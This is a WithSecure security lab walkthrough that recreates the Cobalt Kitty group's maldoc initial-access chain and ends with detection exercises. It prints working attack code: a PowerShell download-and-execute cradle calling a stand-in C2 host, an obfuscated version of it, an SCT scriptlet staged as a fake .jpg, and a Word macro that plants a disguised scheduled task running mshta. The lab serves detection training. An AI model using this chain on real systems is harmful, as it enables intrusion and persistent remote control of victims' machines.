{"id":7584,"date":"2020-06-24T09:00:00","date_gmt":"2020-06-24T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/?post_type=lab_item&#038;p=7584"},"modified":"2026-05-22T12:54:29","modified_gmt":"2026-05-22T11:54:29","slug":"attack-detection-fundamentals-initial-access-lab-3","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/","title":{"rendered":"Attack Detection Fundamentals: Initial Access &#8211; Lab #3"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Initial Access &#8211;<span class=\"blue-text\">Lab #3<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Network Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Offensive security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                24 June, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research2-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_3b60bdcaa3b20c7a390cb016130b75d1\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Content navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    Select a section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Initial Access, we explored a number of offensive techniques for obtaining a foothold within a target environment through the creation and successful delivery of malicious documents (also known as maldocs).<\/p>\n<p>We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a third step-by-step guide to recreating the demos from that Initial Access workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/DDK_hC90kR8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noopener\">first<\/a> <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">two<\/a> labs of this series, we explored two detection strategies, parent-child process analysis (also known as process ancestry) and process network connections. These labs gave us the chance to try out the Covenant and Koadic frameworks and view opportunities for detection.<\/p>\n<p>In this next lab, we are going to reproduce one of the attack vectors used by the Cobalt Kitty group. We will build upon previous labs to produce a Word macro that creates a Scheduled Task that spawns &#x27;mshta.exe&#x27; to run an external script. The external script will then download and execute a second stager that will finally inject a <a href=\"https:\/\/www.cobaltstrike.com\/\" target=\"_blank\" rel=\"noopener\">Cobalt Strike<\/a> beacon in memory using PowerShell.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/cdn2.hubspot.net\/hubfs\/3354902\/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf\" target=\"_blank\" rel=\"noopener\">Cybereason &#8211; Operation Cobalt Kitty<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1170\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; Mshta<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Windows VM<\/li>\n<li>Microsoft Office<\/li>\n<li>AV + Host Firewall turned OFF<\/li>\n<li>Cobalt Strike\/Covenant\/Empire<\/li>\n<\/ul>\n<p>In the walkthrough we will use Cobalt Strike, however, the adaption to another open-source framework is left as an exercise for the reader.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Listener Setup<\/h3>\n<p>The first step is to set up a listener in our C2 framework of choice. The specific steps may vary depending on the framework.<\/p>\n<h3>2 &#8211; PowerShell Payload<\/h3>\n<p>Once the listener is created and operational, we need to create a PowerShell launcher that will deploy our implant. The figure below shows how this looks within Cobalt Strike:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/10a34fcfe8c2cd1ddeed92810d901241-1-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The PowerShell launcher will be in the following form:<\/p>\n<pre><code class=\"language-bash\">powershell -nop -w hidden -c &quot;IEX (New-Object Net.Webclient).downloadstring(&#x27;http:\/\/cobaltstrike.c2\/evil.ps1&#x27;)&quot;<\/code><\/pre>\n<p>With &#x27;http:\/\/cobaltstrike.c2&#x27; replaced with your C2 IP address\/hostname.<\/p>\n<p>The aforementioned PowerShell command downloads a PowerShell script hosted on a remote server and executes it in memory, just as we saw in lab 1.<\/p>\n<p>NOTE: This is the default PowerShell download and execute cradle, other interesting and more advanced examples can be found in harmj0y&#x27;s public <a href=\"https:\/\/gist.github.com\/HarmJ0y\/bb48307ffa663256e239\" target=\"_blank\" rel=\"noopener\">gist<\/a>.<\/p>\n<p>We can break down the command as follows:<\/p>\n<ul>\n<li>&#x27;-nop&#x27;, stands for <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.core\/about\/about_profiles?view=powershell-7#the-noprofile-parameter\" target=\"_blank\" rel=\"noopener\">&amp;quot;no profile&amp;quot;<\/a> .<\/li>\n<li>* &#x27;-w hidden&#x27;, instruct PowerShell not to create a visible window.<\/li>\n<li>* &#x27;-c&#x27;, stands for &quot;command&quot; and everything that will follow will be interpreted as a PowerShell command.<\/li>\n<li>* &#x27;(New-Object Net.Webclient).downloadstring(&#x27;http:\/\/cobaltstrike.c2\/evil.ps1&#x27;)&#x27;, downloads the &#x27;evil.ps1&#x27; script and returns its contents as a string.<\/li>\n<li>* &#x27;IEX&#x27;, an <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.core\/about\/about_aliases?view=powershell-7\" target=\"_blank\" rel=\"noopener\">alias<\/a> for &#x27;Invoke-Expression&#x27;. Takes a string as input (the result of the previous function in this case) and interprets its content as PowerShell commands.<\/li>\n<\/ul>\n<p>For the sake of this lab, we&#x27;re going to take all the code within the &#x27;-c&#x27; block and obfuscate it. In order to do so, we&#x27;re going to use the <a href=\"https:\/\/github.com\/danielbohannon\/Invoke-Obfuscation\" target=\"_blank\" rel=\"noopener\">Invoke-Obfuscation<\/a> framework that was used during Operation Cobalt Kitty&#x27;s activities.<\/p>\n<p>To use the obfuscation framework, a PowerShell interpreter is required. Since the framework does not use any Windows native functionality, any PowerShell interpreter available for other platforms like Linux or macOS will be fine.<\/p>\n<p>In order to import the Invoke-Obfuscation, clone the <a href=\"https:\/\/github.com\/danielbohannon\/Invoke-Obfuscation\" target=\"_blank\" rel=\"noopener\">master repository<\/a> and execute the following commands:<\/p>\n<pre><code class=\"language-bash\">cd Invoke-Obfuscation-master\nImport-Module .\/Invoke-Obfuscation.psd1\nInvoke-Obfuscation<\/code><\/pre>\n<p>If everything worked as expected, you should be presented with the following prompt:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/34885958b7cfb48b2dbfc1c437e22cc9-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>We now need to set the command we want to obfuscate, in this case it will be something like this:<\/p>\n<pre><code class=\"language-bash\">set SCRIPTBLOCK IEX (New-Object Net.Webclient).downloadstring(&#x27;http:\/\/cobaltstrike.c2\/evil.ps1&#x27;)<\/code><\/pre>\n<p>The next step is to select the type of obfuscation we want to apply, for this lab we&#x27;re going to select &#x27;TOKEN&#x27;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/18b1fc1c00be36083d257fb97b8d5f81-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The tool presents us with different obfuscation strategies, we will apply them all using the &#x27;ALL&#x27; command:<\/p>\n<p>To apply the selected transformation to our payload, we now need to press &#x27;1&#x27; and we will receive our obfuscated payload:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/2cf1ae1de98aea5e99b418b322ac849c2-1-scaled.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The resulting payload:<\/p>\n<pre><code class=\"language-bash\">&amp;(&quot;{0}{1}&quot;-f&#x27;I&#x27;,&#x27;EX&#x27;) (.(&quot;{1}{2}{0}&quot;-f &#x27;ect&#x27;,&#x27;New-Ob&#x27;,&#x27;j&#x27;) (&quot;{3}{0}{2}{1}&quot; -f&#x27;e&#x27;,&#x27;ent&#x27;,&#x27;bcli&#x27;,&#x27;Net.W&#x27;)).(&quot;{3}{1}{0}{2}&quot;-f &#x27;tr&#x27;,&#x27;s&#x27;,&#x27;ing&#x27;,&#x27;download&#x27;).Invoke((&quot;{0}{1}{4}\n\n{2}{6}{5}{3}{7}{8}&quot; -f &#x27;http&#x27;,&#x27;:\/\/&#x27;,&#x27;obal&#x27;,&#x27;rike\/ev&#x27;,&#x27;c&#x27;,&#x27;t&#x27;,&#x27;ts&#x27;,&#x27;i&#x27;,&#x27;l.ps1&#x27;))<\/code><\/pre>\n<p>NOTE: When developing more convoluted initial access vectors, it is recommended to test each part of the payload chain to make sure that it works as expected. This type of testing is left to the reader.<\/p>\n<p>The final step of this stage is to save the obfuscated payload in a file called &#x27;microsoft.jpg&#x27; (the naming convention is specific to this threat actor), and host it on our C2 framework or other webserver.<\/p>\n<p>We used Cobalt Strike&#x27;s built-in HTTP server to host the file and the resulting URL will be &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoft.jpg&#x27;.<\/p>\n<h3>3 &#8211; SCT Payload<\/h3>\n<p>The next component of our staging process is an SCT file that will be used to execute our previously built PowerShell payload.<\/p>\n<p>SCT files can contain JavaScript or VBScript directives to execute additional commands. Examples of its usage in offensive operations can be found on MITRE&#x27;s website:<\/p>\n<ul>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; Scripting<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1117\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; Regsvr32<\/a><\/li>\n<\/ul>\n<p>We are using <a href=\"https:\/\/gist.github.com\/bohops\/6ded40c4989c673f2e30b9a6c1985019\" target=\"_blank\" rel=\"noopener\">this<\/a> template as a starting point for building our stager. You&#x27;ll see that the PoC in the template is used to spawn &#x27;calc.exe&#x27;:<\/p>\n<pre><code class=\"language-bash\">&lt;script language=&quot;JScript&quot;&gt;\n    &lt;![CDATA[var r = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;calc.exe&quot;);]]&gt;&lt;\/script&gt;<\/code><\/pre>\n<p>In order to weaponise the PoC, we are going to substitute &#x27;calc.exe&#x27; with a PowerShell download cradle, that fetches our obfuscated PowerShell launcher and executes it. The final code will be something similar to this:<\/p>\n<pre><code class=\"language-bash\">&lt;?XML version=&quot;1.0&quot;?&gt;\n&lt;scriptlet&gt;\n&lt;registration description=&quot;Bandit&quot; progid=&quot;Bandit&quot; version=&quot;1.00&quot; classid=&quot;{AAAA1111-0000-0000-0000-0000FEEDACDC}&quot;&gt;\n&lt;!-- Proof Of Concept - Casey Smith @subTee --&gt;\n&lt;!-- @RedCanary - https:\/\/raw.githubusercontent.com\/redcanaryco\/atomic-red-team\/atomic-dev-cs\/Windows\/Payloads\/mshta.sct --&gt;\n&lt;script language=&quot;JScript&quot;&gt;\n&lt;![CDATA[\nvar r = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell.exe iex (iwr &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoft.jpg&#x27;)&quot;, 0, false);\n]]&gt;\n&lt;\/script&gt;\n&lt;\/registration&gt;\n\n&lt;public&gt;\n&lt;method name=&quot;Exec&quot;&gt;&lt;\/method&gt;\n&lt;\/public&gt;\n&lt;script language=&quot;JScript&quot;&gt;\n&lt;![CDATA[\nfunction Exec()\n{\nvar r = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;powershell.exe iex (iwr &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoft.jpg&#x27;)&quot;, 0, false);\n}\n]]&gt;\n&lt;\/script&gt;\n&lt;\/scriptlet&gt;<\/code><\/pre>\n<p>Save the file as &#x27;microsoftftp.jpg&#x27; and host it on the webserver used to serve the previously-created PowerShell stager.<\/p>\n<p>The resulting URL will be &#x27;http:\/\/cobaltstrike.c2\/updates\/microsoftftp.jpg&#x27;.<\/p>\n<h3>4 &#8211; Macro Code<\/h3>\n<p>The final stage of our attack will be the creation of a Word document with a malicious VBA macro. The macro will create a scheduled task that will subsequently trigger the whole staging process we just created.<\/p>\n<p>To enable macro editing, open Word and right click on the toolbar on top of the screen and select &quot;Customize the Ribbon&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/1d17f4044b999f40f8000b89a5093b87-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Check the &quot;Developer&quot; box as follows:<\/p>\n<p>A &quot;Developer&quot; tab should now be visible within the toolbar. Select &quot;Visual Basic&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/19a95865ad7b9d59febf6e0b32734056-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>This will open the Visual Basic editor where we will place our macro code. You can use the following code as a template:<\/p>\n<pre><code class=\"language-bash\">Sub Auto_open()\nCall Shell(&quot;schtasks \/create \/sc MINUTE \/tn &quot;&quot;Windows Error Reporting&quot;&quot; \/tr &quot;&quot;mshta.exe javascript:a=GetObject(&#x27;script:http:\/\/cobaltstrike.c2\/updates\/microsoftftp.jpg&#x27;).Exec();close();&quot;&quot; \/mo 15 \/F&quot;)\nEnd Sub<\/code><\/pre>\n<p>Let&#x27;s break down the macro code:<\/p>\n<ul>\n<li>&#x27;Sub Auto_open()&#x27; declares a function that will be executed automatically when the document is open (after the user accepted the security prompt for enabling macro).<\/li>\n<li>&#x27;Call Shell&#x27; will execute a shell command. In this case, we will execute &#x27;schtasks.exe&#x27;, which is the executable responsible for managing scheduled tasks within Windows systems.<\/li>\n<\/ul>\n<p>A brief description of the flags used for &#x27;schtasks&#x27; is provided below:<\/p>\n<ul>\n<li>&#x27;\/create&#x27; used to create a new task.<\/li>\n<li>&#x27;\/sc MINUTE \/mo 15&#x27; used to specify that the task will be executed every 15 minutes.<\/li>\n<li>&#x27;\/tn &quot;&quot;Windows Error Reporting&quot;&quot;&#x27; used to specify the task name, the actors chose a name that would likely blend in with other tasks.<\/li>\n<li>&#x27;\/tr &quot;&quot;mshta.exe javascript:a=GetObject(&#x27;script:http:\/\/cobaltstrike.c2\/updates\/microsoftftp.jpg&#x27;).Exec();close();&quot;&quot;&#x27; specifies the custom action that the task will execute. In this case it will execute our previously-created SCT file (masked as &#x27;microsoftftp.jpg&#x27;) using &#x27;mshta.exe&#x27;.<\/li>\n<\/ul>\n<p>NOTE: A more detailed analysis of this approach is presented in the original research by Cybereason (provided as a reference).<\/p>\n<p>Now it is possible to test the whole chain by clicking the &quot;Run&quot; button from the Visual Basic editor, as shown below:<\/p>\n<p>If everything worked as expected, you should now have an active session on your C2 framework using one of the delivery methods used by a real APT!<\/p>\n<p>It didn&#x27;t work? Use the following checklist for troubleshooting:<\/p>\n<ul>\n<li>Did you turn off the AV? Despite this attack chain involves multiple steps, the final payload is still a default one and therefore should be picked up by AMSI\/AV.<\/li>\n<li>Is there connectivity between your testing VM where the payload was executed and the C2 server? Don&#x27;t forget the host firewall!<\/li>\n<li>When you hosted the stagers, which webserver did you use? Try modifying the content type of the response to &#x27;text\/plain&#x27; to avoid errors.<\/li>\n<\/ul>\n<h2>Exercises<\/h2>\n<p>The following questions will guide the reader through the analysis of the attack.<\/p>\n<ul>\n<li>Using parent-child analysis within Sysmon logs, are you able to spot any anomaly?<\/li>\n<li>Which executables were spawned by WINWORD.EXE? Are they suspicious?<\/li>\n<li>Can you identify at least one <a href=\"https:\/\/lolbas-project.github.io\/\" target=\"_blank\" rel=\"noopener\">LOLbin<\/a> that generated a network connection? (Sysmon EID 3)<\/li>\n<li>Using static analysis techniques (<a href=\"https:\/\/www.decalage.info\/python\/oletools\" target=\"_blank\" rel=\"noopener\">oletools<\/a>, <a href=\"https:\/\/cuckoosandbox.org\/\" target=\"_blank\" rel=\"noopener\">Cuckoo<\/a>, <a href=\"https:\/\/github.com\/VirusTotal\/yara\" target=\"_blank\" rel=\"noopener\">Yara<\/a>) would you be able to create signatures for this payload?<\/li>\n<li>The macro code uses &#x27;schtasks&#x27; to create a scheduled task, could you find a stealthier way of creating such a task, without spawning additional processes? How would you detected this?<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>The third lab of this series covered the initial access mechanism employed by the Cobalt Group. The attack involved multiple steps for a fully file-less chain. This example was a bit more convoluted than the other ones, but represents a more real-life scenario.<\/p>\n<p>Despite the added complexity, the detection strategies remain the same. In fact, parent-child process analysis combined with network events would spot every component of this chain.<\/p>\n<p>The final lab of the Initial Access workshop can be found <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-4\/\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 